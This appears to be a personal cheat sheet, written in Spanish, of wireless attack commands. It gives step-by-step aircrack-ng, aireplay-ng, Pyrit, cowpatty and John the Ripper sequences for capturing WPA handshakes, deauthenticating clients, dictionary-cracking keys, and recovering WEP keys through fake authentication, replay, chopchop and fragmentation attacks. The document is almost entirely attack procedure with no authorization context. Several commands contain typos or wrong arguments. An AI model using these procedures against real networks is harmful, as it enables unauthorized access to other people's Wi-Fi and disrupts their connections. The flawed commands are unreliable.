
#FUERZA BRUTA CON JONH THE RIPPER
aircrack-ng -J <nombre_de_nueva_captura> <captura.cap>
hccap2john <nombre_de_nueva_captura.hccap> > my_hash
john --wordlist=diccionario.txt my_hash --format=wpapsk
john --show my_hash 
# FUERZA BRUTA CON JONH THE RIPPER (2)
john --wordlist=diccionario --rules --stdout | aircrack-ng -e <essid> -w - <captura.cap>

# VALIDACION DEL HANDSHAKE CON PYRIT
pyrit -r <captura.cap> analyze

# CRACKING CON PYRIT
pyrit -e <essid> -i <diccionario> -r <captura.cap> attack_passthrough
pyrit -b <bssid> -i <diccionario> -r <captura.cap> attack_passthrough

# CRACKING CON PYRIT (BASE DE DATOS)
pyrit -i <diccionario.txt> import_passwords
pyrit -e <essid> create_essid
pyrit batch
pyrit -r <captura.cap> attack_db

# CRACKING CON COWPATTY
cowpatty -r <captura.cap> -f <diccionario> -s <essid>

#---------------------------------------------WPA/WPA2-------------------------------------------------------
# AIRCRACK_NG WPA/WPA2
airmon-ng start wlan0
airodump-ng -c <canal> --bssid <bssid> -w <save_file> -a wlan0mon
aireplay-ng -0 1 -a <bssid_AP> -c <bssid_de_un_cliente> wlan0mon
aircrack-ng -w <diccionario> wlan0mon

# ROMPIENDO WPA CON PYRIT
airmon-ng start wlan0
pyrit -r wlan0mon -o <save_file> striplive
aireplay-ng -0 1 -a <bssid_AP> -c <bssid_de_un_cliente> wla0mon
pyrit -b <bssid> -i <diccionario> -r <captura.cap> attack_passthrough

#-------------------------------------------------WEP-------------------------------------------------------
# DESCIFRADO WEP CON CLIENTES CONECTADOS
airmon-ng start wlan0 
airodump-ng -c <canal> --bssid <bssid_AP> -w <save_file> wlan0mon
aireplay-ng -1 0 -e <essid_AP> -a <bssid_AP> -h <MAC_wlan0mon> wlan0mon		 (Fake authentication)
aireplay-ng -3 -b <bssid_AP> -h <MAC_wlan0mon> wlan0mon						 (ARP replay attack)
aireplay-ng -0 1 -a <bssid_AP> -c <MAC_VICTIMA> wlan0mon					 (Deauthentication attack)
aircrack-ng -b <bssid_AP> <captura.cap>

#CRACKING WEP A TRAVËS DE UN CLIENTES CONECTADO
airmon-ng start wlan0
airodump-ng -c <canal> -bssid <bssid_AP> -w <save_file> wlan0mon
aireplay-ng -1 0 -e <essid_AP> -a <bssid_AP> -h <mac_wlan0mon> wlan0mon		(Fake authentication)
aireplay-ng -2 -b <bssid_AP> -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 wlan0mon (Interactive Packet Replay Attack)
aircrack-ng -z <file .cap>

# ELUDIR LA AUTENTICACION DE CLAVE COMPARTDA WEP
airmon-ng start wlan0
airodump-ng -c <canal> --bssid <bssid_AP> -w <save_file> wlan0mon
aireplay-ng -0 1 -a <bssid_AP> -c <MAC VICTIM> wlan0mon
aireplay-ng -1 0 -e <essid_AP> -y <.XOR FILENAME> -a <bssid_AP> -h <mac_wlan0mon> wlan0mon
aireplay-ng -3 -b <bssid_AP> -h <MAC_wlan0mon> wlan0mon
aireplay-ng -0 1 -a <bssid_AP> -c <MAC VICTIM> wlan0mon
aircrack-ng <file .cap>



# RED WEP SIN CLIENTES AUTENTICACION ABIERTA (CHOP-CHOP) 
airmon-ng start wlan0
airodump.ng -c <canal> --bssid <bssid_AP> -w <save_file> wlan0mon
aireplay-ng -1 0 -e <essid_AP> -a <bssid_AP> -h <MAC_wlan0mon> wlan0mon      (Fake authentication)
aireplay-ng -4 -b <bssid_AP> -h <mac_wlan0mon> wlan0mon						 (ataque chopchop de korek)
presinamos "y"
packetforge-ng -0 -a <bssid_AP> -h <wlan0mon> -l <SOURCE_IP> -k <DEST_IP> -y <file .xor> -w <save_file_2>
aireplay-ng -2 -r <save_file_2> wlan0mon
aircrack-ng <file_.cap>

# RED WEP SIN CLIENTES AUTENTICACION ABIERTA (ATAQUE DE FRAGMENTACION)
airmon-ng start wlan0mon
airodump-ng -c <canal> --bssid <bssid_AP> -w <save_file> wlan0mon
aireplay-ng -1 0 -e <essid_AP> -a <bssid_AP> -h <MAC_wlan0mon> wlan0mon
aireplay-ng -5 -b <bssid_AP> -h <MAC_wlan0mon> wlan0mon						  (ataque de fragmentacion)
packetforge-ng -0 -a <bssid_AP> -h <MAC_wlan0mon> -l <SOURCE_IP> -k <DEST_IP> -y <file .xor> -w <save_file_2>
aireplay-ng -2 -r <save_file_2> wlan0mon
aircrack-ng <file_.cap>




aireplay -a -b (?)


